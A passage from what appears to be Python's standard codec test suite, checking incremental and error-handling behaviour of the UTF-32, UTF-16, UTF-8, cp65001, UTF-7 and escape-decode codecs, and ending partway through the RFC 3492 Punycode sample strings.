                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_32_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_32_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_le)[0])
        encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_be)[0])
class UTF32LETest(ReadTest, unittest.TestCase):
    encoding = "utf-32-le"
    # Lone low surrogate U+DC80, little-endian, for the surrogate tests.
    ill_formed_sequence = b"\x80\xdc\x00\x00"

    def test_partial(self):
        # No BOM for the endian-specific codec: 4 bytes per code point.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_le_decode(encoded)[0])
class UTF32BETest(ReadTest, unittest.TestCase):
    encoding = "utf-32-be"
    # Lone low surrogate U+DC80, big-endian, for the surrogate tests.
    ill_formed_sequence = b"\x00\x00\xdc\x80"

    def test_partial(self):
        # No BOM for the endian-specific codec: 4 bytes per code point.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_be_decode(encoded)[0])
class UTF16Test(ReadTest, unittest.TestCase):
    encoding = "utf-16"
    # Lone low surrogate U+DC80 in native byte order.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc"
    else:
        ill_formed_sequence = b"\xdc\x80"

    # "spamspam" encoded with a single leading BOM, little/big endian.
    spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
    spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        # An invalid BOM must raise UnicodeError on read.
        s = io.BytesIO(b"\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(b"\xff\xff\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        # Expected incremental output after each input byte (2 bytes of
        # BOM, then 2 bytes per BMP code point, 4 for the supplementary).
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read => byteorder known
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_16_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_16_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_bug691291(self):
        # Files are always opened in binary mode, even if no binary mode was
        # specified. This means that no automatic conversion of '\n' is done
        # on reading and writing.
        s1 = 'Hello\r\nworld\r\n'

        s = s1.encode(self.encoding)
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, 'wb') as fp:
            fp.write(s)
        with support.check_warnings(('', DeprecationWarning)):
            reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
        with reader:
            self.assertEqual(reader.read(), s1)
class UTF16LETest(ReadTest, unittest.TestCase):
    encoding = "utf-16-le"
    # Lone low surrogate U+DC80, little-endian.
    ill_formed_sequence = b"\x80\xdc"

    def test_partial(self):
        # No BOM for the endian-specific codec: 2 bytes per BMP code
        # point, 4 for the supplementary character.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # Each truncated/ill-formed input must raise under "strict" and
        # decode to the given string under "replace".
        tests = [
            (b'\xff', '\ufffd'),
            (b'A\x00Z', 'A\ufffd'),
            (b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
            (b'\x00\xd8', '\ufffd'),
            (b'\x00\xd8A', '\ufffd'),
            (b'\x00\xd8A\x00', '\ufffdA'),
            (b'\x00\xdcA\x00', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16le', 'replace'), expected)

    def test_nonbmp(self):
        # Supplementary characters round-trip as surrogate pairs.
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\x00\xd8\x03\xde')
        self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
                         "\U00010203")
class UTF16BETest(ReadTest, unittest.TestCase):
    encoding = "utf-16-be"
    # Lone low surrogate U+DC80, big-endian.
    ill_formed_sequence = b"\xdc\x80"

    def test_partial(self):
        # No BOM for the endian-specific codec: 2 bytes per BMP code
        # point, 4 for the supplementary character.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # Each truncated/ill-formed input must raise under "strict" and
        # decode to the given string under "replace".
        tests = [
            (b'\xff', '\ufffd'),
            (b'\x00A\xff', 'A\ufffd'),
            (b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
            (b'\xd8\x00', '\ufffd'),
            (b'\xd8\x00\xdc', '\ufffd'),
            (b'\xd8\x00\x00A', '\ufffdA'),
            (b'\xdc\x00\x00A', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16be', 'replace'), expected)

    def test_nonbmp(self):
        # Supplementary characters round-trip as surrogate pairs.
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\xd8\x00\xde\x03')
        self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
                         "\U00010203")
class UTF8Test(ReadTest, unittest.TestCase):
    encoding = "utf-8"
    # Lone low surrogate U+DC80 as three UTF-8 bytes; "replace" yields
    # one replacement character per ill-formed byte.
    ill_formed_sequence = b"\xed\xb2\x80"
    ill_formed_sequence_replace = "\ufffd" * 3

    def test_partial(self):
        # Expected incremental output after each input byte (1-4 bytes
        # per code point depending on its value).
        self.check_partial(
            "\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_decoder_state(self):
        u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
        self.check_state_handling_decode(self.encoding,
                                         u, u.encode(self.encoding))

    def test_lone_surrogates(self):
        super().test_lone_surrogates()
        # not sure if this is making sense for
        # UTF-16 and UTF-32
        self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
                         b'[\x80]')

    def test_surrogatepass_handler(self):
        # "surrogatepass" must let lone surrogates through both ways,
        # but still reject truncated surrogate byte sequences.
        self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0".decode("utf-8", "surrogatepass")
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@unittest.skipUnless(sys.platform == 'win32',
                     'cp65001 is a Windows-only codec')
class CP65001Test(ReadTest, unittest.TestCase):
    # cp65001 is the Windows code page number for UTF-8.  Surrogate handling
    # differs before Windows Vista, hence the VISTA_OR_LATER branches below.
    encoding = "cp65001"

    def test_encode(self):
        # Entries are (text, error handler, expected bytes); an expected
        # value of None means the encode call must raise UnicodeEncodeError.
        tests = [
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict', b'\xc3\xa9\xe2\x82\xac'),
            ('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                ('\udc80', 'strict', None),
                ('\udc80', 'ignore', b''),
                ('\udc80', 'replace', b'?'),
                ('\udc80', 'backslashreplace', b'\\udc80'),
                ('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
            ))
        else:
            # Pre-Vista encodes the lone surrogate as-is instead of failing.
            tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
        for text, errors, expected in tests:
            if expected is not None:
                try:
                    encoded = text.encode('cp65001', errors)
                except UnicodeEncodeError as err:
                    self.fail('Unable to encode %a to cp65001 with '
                              'errors=%r: %s' % (text, errors, err))
                self.assertEqual(encoded, expected,
                                 '%a.encode("cp65001", %r)=%a != %a'
                                 % (text, errors, encoded, expected))
            else:
                self.assertRaises(UnicodeEncodeError,
                                  text.encode, "cp65001", errors)

    def test_decode(self):
        # Entries are (bytes, error handler, expected text); an expected
        # value of None means the decode call must raise UnicodeDecodeError.
        tests = [
            (b'abc', 'strict', 'abc'),
            (b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
            (b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
            (b'\xef\xbf\xbd', 'strict', '\ufffd'),
            (b'[\xc3\xa9]', 'strict', '[\xe9]'),
            # invalid bytes
            (b'[\xff]', 'strict', None),
            (b'[\xff]', 'ignore', '[]'),
            (b'[\xff]', 'replace', '[\ufffd]'),
            (b'[\xff]', 'surrogateescape', '[\udcff]'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', None),
                (b'[\xed\xb2\x80]', 'ignore', '[]'),
                (b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
            ))
        else:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
            ))
        for raw, errors, expected in tests:
            if expected is not None:
                try:
                    decoded = raw.decode('cp65001', errors)
                except UnicodeDecodeError as err:
                    self.fail('Unable to decode %a from cp65001 with '
                              'errors=%r: %s' % (raw, errors, err))
                self.assertEqual(decoded, expected,
                                 '%a.decode("cp65001", %r)=%a != %a'
                                 % (raw, errors, decoded, expected))
            else:
                self.assertRaises(UnicodeDecodeError,
                                  raw.decode, 'cp65001', errors)

    @unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_lone_surrogates(self):
        # Lone surrogates are rejected by default, but each error handler
        # has a well-defined substitution.
        self.assertRaises(UnicodeEncodeError, "\ud800".encode, "cp65001")
        self.assertRaises(UnicodeDecodeError, b"\xed\xa0\x80".decode, "cp65001")
        self.assertEqual("[\uDC80]".encode("cp65001", "backslashreplace"),
                         b'[\\udc80]')
        self.assertEqual("[\uDC80]".encode("cp65001", "xmlcharrefreplace"),
                         b'[&#56448;]')
        self.assertEqual("[\uDC80]".encode("cp65001", "surrogateescape"),
                         b'[\x80]')
        self.assertEqual("[\uDC80]".encode("cp65001", "ignore"),
                         b'[]')
        self.assertEqual("[\uDC80]".encode("cp65001", "replace"),
                         b'[?]')

    @unittest.skipUnless(VISTA_OR_LATER, 'require Windows Vista or later')
    def test_surrogatepass_handler(self):
        # "surrogatepass" lets lone surrogates round-trip unchanged.
        self.assertEqual("abc\ud800def".encode("cp65001", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("cp65001", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("cp65001", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("cp65001", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))

    def test_readline(self):
        self.skipTest("issue #20571: code page 65001 codec does not "
                      "support partial decoder yet")
class UTF7Test(ReadTest, unittest.TestCase):
    encoding = "utf-7"

    def test_partial(self):
        # Feed the UTF-7 encoding of the first argument to an incremental
        # decoder one byte at a time; entry N of the list is the text that
        # must have been produced after N bytes.  Base64 runs ("+...-") only
        # emit characters once a full code unit has been accumulated.
        self.check_partial(
            'a+-b\x00c\x80d\u0100e\U00010000f',
            [
                'a',
                'a',
                'a+',
                'a+-',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b',
                'a+-b\x00',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c',
                'a+-b\x00c\x80',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d',
                'a+-b\x00c\x80d\u0100',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e',
                'a+-b\x00c\x80d\u0100e\U00010000',
                'a+-b\x00c\x80d\u0100e\U00010000f',
            ]
        )

    def test_errors(self):
        # (malformed input, expected output with errors="replace"); every
        # input must also raise UnicodeDecodeError in strict mode.
        tests = [
            (b'a\xffb', 'a\ufffdb'),
            (b'a+IK', 'a\ufffd'),
            (b'a+IK-b', 'a\ufffdb'),
            (b'a+IK,b', 'a\ufffdb'),
            (b'a+IKx', 'a\u20ac\ufffd'),
            (b'a+IKx-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr', 'a\u20ac\ufffd'),
            (b'a+IKwgr-b', 'a\u20ac\ufffdb'),
            (b'a+IKwgr,', 'a\u20ac\ufffd'),
            (b'a+IKwgr,-b', 'a\u20ac\ufffd-b'),
            (b'a+IKwgrB', 'a\u20ac\u20ac\ufffd'),
            (b'a+IKwgrB-b', 'a\u20ac\u20ac\ufffdb'),
            (b'a+/,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+//,+IKw-b', 'a\ufffd\u20acb'),
            (b'a+///,+IKw-b', 'a\uffff\ufffd\u20acb'),
            (b'a+////,+IKw-b', 'a\uffff\ufffd\u20acb'),
        ]
        for raw, expected in tests:
            with self.subTest(raw=raw):
                self.assertRaises(UnicodeDecodeError, codecs.utf_7_decode,
                                  raw, 'strict', True)
                self.assertEqual(raw.decode('utf-7', 'replace'), expected)

    def test_nonbmp(self):
        # A non-BMP character and the equivalent explicit surrogate pair
        # encode to the same base64 run, and that run decodes back to the
        # single non-BMP character.
        self.assertEqual('\U000104A0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual('\ud801\udca0'.encode(self.encoding), b'+2AHcoA-')
        self.assertEqual(b'+2AHcoA-'.decode(self.encoding), '\U000104A0')

    # The inherited lone-surrogate checks are not applicable here; setting
    # the attribute to None disables that inherited test.
    test_lone_surrogates = None
class UTF16ExTest(unittest.TestCase):
    """Tests for the low-level codecs.utf_16_ex_decode() helper."""

    def test_errors(self):
        """A single dangling byte cannot be decoded in strict mode."""
        self.assertRaises(UnicodeDecodeError,
                          codecs.utf_16_ex_decode, b"\xff", "strict", 0, True)

    def test_bad_args(self):
        """Calling without any arguments is a TypeError."""
        self.assertRaises(TypeError, codecs.utf_16_ex_decode)
class ReadBufferTest(unittest.TestCase):
    """Tests for the codecs.readbuffer_encode() helper."""

    def test_array(self):
        """Any object supporting the buffer API is accepted, e.g. array."""
        import array
        buf = array.array("b", b"spam")
        self.assertEqual(codecs.readbuffer_encode(buf), (b"spam", 4))

    def test_empty(self):
        """An empty input yields empty bytes and a consumed length of 0."""
        self.assertEqual(codecs.readbuffer_encode(""), (b"", 0))

    def test_bad_args(self):
        """Missing or non-buffer arguments raise TypeError."""
        self.assertRaises(TypeError, codecs.readbuffer_encode)
        self.assertRaises(TypeError, codecs.readbuffer_encode, 42)
class UTF8SigTest(UTF8Test, unittest.TestCase):
    # UTF-8 with a BOM ("signature"): the first encoded BOM is stripped on
    # decode; any later BOM is a real U+FEFF character.
    encoding = "utf-8-sig"

    def test_partial(self):
        # Entry N is the text decoded after the first N bytes of the
        # encoded form of the first argument.
        self.check_partial(
            "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "",
                "",
                "", # First BOM has been read and skipped
                "",
                "",
                "\ufeff", # Second BOM has been read and emitted
                "\ufeff\x00", # "\x00" read and emitted
                "\ufeff\x00", # First byte of encoded "\xff" read
                "\ufeff\x00\xff", # Second byte of encoded "\xff" read
                "\ufeff\x00\xff", # First byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff", # Second byte of encoded "\u07ff" read
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff",
                "\ufeff\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_bug1601501(self):
        # SF bug #1601501: check that the codec works with a buffer
        # (a bare BOM decodes to the empty string).
        self.assertEqual(str(b"\xef\xbb\xbf", "utf-8-sig"), "")

    def test_bom(self):
        # The BOM added while encoding is stripped again while decoding.
        d = codecs.getincrementaldecoder("utf-8-sig")()
        s = "spam"
        self.assertEqual(d.decode(s.encode("utf-8-sig")), s)

    def test_stream_bom(self):
        # Stream reading with a leading BOM, over many chunk sizes
        # (None means "read everything at once").
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"
        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()
                if not data:
                    break
                ostream.write(data)
            got = ostream.getvalue()
            self.assertEqual(got, unistring)

    def test_stream_bare(self):
        # Same as test_stream_bom but without a BOM in the input.
        unistring = "ABC\u00A1\u2200XYZ"
        bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"
        reader = codecs.getreader("utf-8-sig")
        for sizehint in [None] + list(range(1, 11)) + \
                        [64, 128, 256, 512, 1024]:
            istream = reader(io.BytesIO(bytestring))
            ostream = io.StringIO()
            while 1:
                if sizehint is not None:
                    data = istream.read(sizehint)
                else:
                    data = istream.read()
                if not data:
                    break
                ostream.write(data)
            got = ostream.getvalue()
            self.assertEqual(got, unistring)
class EscapeDecodeTest(unittest.TestCase):
    # Tests for codecs.escape_decode(), which applies bytes-literal
    # (b"...") escape-sequence rules to raw bytes.

    def test_empty(self):
        self.assertEqual(codecs.escape_decode(b""), (b"", 0))

    def test_raw(self):
        # Any byte other than the backslash passes through unchanged.
        decode = codecs.escape_decode
        for b in range(256):
            b = bytes([b])
            if b != b'\\':
                self.assertEqual(decode(b + b'0'), (b + b'0', 2))

    def test_escape(self):
        decode = codecs.escape_decode
        check = coding_checker(self, decode)
        # Standard single-character escapes (an escaped newline vanishes).
        check(b"[\\\n]", b"[]")
        check(br'[\"]', b'["]')
        check(br"[\']", b"[']")
        check(br"[\\]", br"[\]")
        check(br"[\a]", b"[\x07]")
        check(br"[\b]", b"[\x08]")
        check(br"[\t]", b"[\x09]")
        check(br"[\n]", b"[\x0a]")
        check(br"[\v]", b"[\x0b]")
        check(br"[\f]", b"[\x0c]")
        check(br"[\r]", b"[\x0d]")
        # Octal escapes consume up to three digits; \8 is not an escape.
        check(br"[\7]", b"[\x07]")
        check(br"[\8]", br"[\8]")
        check(br"[\78]", b"[\x078]")
        check(br"[\41]", b"[!]")
        check(br"[\418]", b"[!8]")
        check(br"[\101]", b"[A]")
        check(br"[\1010]", b"[A0]")
        # Octal values above 0o377 wrap modulo 256 (0o501 & 0xff == ord('A')).
        check(br"[\501]", b"[A]")
        # Hex escapes take exactly two digits; \X (uppercase) is no escape.
        check(br"[\x41]", b"[A]")
        check(br"[\X41]", br"[\X41]")
        check(br"[\x410]", b"[A0]")
        # Unrecognized escapes keep the backslash.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567x':
                b = bytes([b])
                check(b'\\' + b, b'\\' + b)

    def test_errors(self):
        # Truncated \x escapes raise ValueError in strict mode; "ignore"
        # drops them and "replace" substitutes a '?'.
        decode = codecs.escape_decode
        self.assertRaises(ValueError, decode, br"\x")
        self.assertRaises(ValueError, decode, br"[\x]")
        self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
        self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
        self.assertRaises(ValueError, decode, br"\x0")
        self.assertRaises(ValueError, decode, br"[\x0]")
        self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
        self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
class RecodingTest(unittest.TestCase):
    # Regression test: writing through an EncodedFile that recodes between
    # two codecs used to crash the interpreter at exit.
    # NOTE(review): the "unicode_internal" codec is deprecated and was
    # removed in Python 3.9, so this test targets older interpreters.
    def test_recoding(self):
        f = io.BytesIO()
        f2 = codecs.EncodedFile(f, "unicode_internal", "utf-8")
        f2.write("a")
        f2.close()
        # Python used to crash on this at exit because of a refcount
        # bug in _codecsmodule.c
# From RFC 3492
# Official Punycode sample strings (RFC 3492 section 7.1).  Each entry is
# (unicode text, expected punycode bytes).
punycode_testcases = [
    # A Arabic (Egyptian):
    ("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
     "\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
     b"egbpdaj6bu4bxfgehfvwxn"),
    # B Chinese (simplified):
    ("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
     b"ihqwcrb4cv8a8dqg056pqjye"),
    # C Chinese (traditional):
    ("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
     b"ihqwctvzc91f659drss3x8bo0yb"),
    # D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
    ("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
     "\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
     "\u0065\u0073\u006B\u0079",
     b"Proprostnemluvesky-uyb24dma41a"),
    # E Hebrew:
    ("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
     "\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
     "\u05D1\u05E8\u05D9\u05EA",
     b"4dbcagdahymbxekheh6e0a7fei0b"),
    # F Hindi (Devanagari):
    ("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
     "\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
     "\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
     "\u0939\u0948\u0902",
     b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
    #(G) Japanese (kanji and hiragana):
    ("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
     "\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
     b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
    # (H) Korean (Hangul syllables):
    ("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
     "\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
     "\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
     b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
     b"psd879ccm6fea98c"),
    # (I) Russian (Cyrillic):
    ("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
     "\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
     "\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
     "\u0438",
     b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
    # (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
    ("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
     "\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
     "\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
     "\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
     "\u0061\u00F1\u006F\u006C",
     b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
    # (K) Vietnamese:
    # T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
    # <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
